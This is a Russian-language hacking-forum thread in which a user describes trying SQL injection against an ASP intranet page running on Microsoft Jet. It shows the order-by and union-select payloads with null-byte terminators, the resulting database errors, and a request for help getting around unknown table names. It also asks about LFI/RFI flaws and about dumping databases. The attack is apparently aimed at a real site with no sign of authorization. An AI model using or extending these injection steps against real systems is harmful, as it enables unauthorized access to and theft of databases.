http://forum.antichat.ru/thread19844.html
Затем прочти пару статей от електа на тему реализации more1row инъецкий.
Так же говорять что Qwazar очень хорошо описал какую то новую технотогию, точно не скажу, сам еще не читал эту статью.
Последний раз редактировалось Ins3t; 09.11.2009 в 22:24..
Microsoft JET Database Engine error '80040e14'
The Microsoft Jet database engine does not recognize '6' as a valid field name or expression.
а на:
=-1+order+by+4%00
страница открывается, но на нем тоже
Код:
Latest News
Microsoft JET Database Engine error '80040e14'
The Microsoft Jet database engine does not recognize '4' as a valid field name or expression.
/intranet/inx/ecom_engine.asp, line 2462
на запрос:
Код:
=-1+union+select+1,2,3,4%00
Код:
Microsoft JET Database Engine error '80004005'
Query input must contain at least one table or query.
/intranet/inx/ecom_engine.asp, line 2462
как обойти? Правда ни одного названия таблиц не знаю.
Может есть новые статьи по Jet database
Кстати, читаю про PHP inject (include), мне даже очень интересно кажется ) спасибо за направление !
Кстати, хотел узнать тенденцию этого уязвимости.. т.е. актино приниается, или редко встречается ? (по сравнение SQL инекции)
на сколько понял - о сливи БД тут речь не может идти.. это уже SQL инекцями, да?
про LFI/RFI-уязвимости читал ЗДЕСЬ , но не очень понятно был что, зачем и как.. попробую еще искать ...
спасибо за помощь.